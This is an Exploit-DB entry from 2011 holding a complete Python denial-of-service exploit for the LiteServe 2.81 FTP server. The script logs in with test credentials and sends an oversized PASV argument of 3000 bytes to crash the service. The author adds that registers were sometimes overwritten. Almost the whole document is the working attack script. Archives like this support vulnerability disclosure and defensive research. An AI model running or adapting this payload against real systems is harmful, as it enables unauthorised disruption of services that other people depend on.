LiteServe 2.81 - 'PASV' Denial of Service

EDB-ID:

17638

CVE:

N/A

EDB Verified:

Author:

Craig Freyman

Type:

dos

Exploit:   /  

Platform:

Windows

Date:

2011-08-08

Vulnerable App: 
#!/usr/bin/python
#Title: LiteServe 2.81 PASV Command DoS
#Author: Craig Freyman (@cd1zz)
#Date: Bug found July 25, 2011 - Vendor approved release August 7, 2011
#Tested on Windows XP SP3 and Server 2003 SP2
#Software: http://www.cmfperception.com/liteserve.html
#Notes: In certain conditions that I could not reproduce reliably, registers were
#overwritten. There are a number of other FTP commands that exhibit the same behavior.

import socket,sys,time,struct

if len(sys.argv) < 2:
     print "[-]Usage: %s <target addr> " % sys.argv[0]
     sys.exit(0)

target = sys.argv[1]

if len(sys.argv) > 2:
     platform = sys.argv[2]

crash = "\x41" * 3000

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

try:
    s.connect((target,21))
except:
    print "[-] Connection to "+target+" failed!"
    sys.exit(0)

print "[*] Sending " + `len(crash)` + " byte crash..."

s.send("USER test\r\n")
s.recv(1024)
s.send("PASS test\r\n")
s.recv(1024)
s.send("PASV "+crash+"\r\n")
print "Sleeping..."
time.sleep(5)
s.close()
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services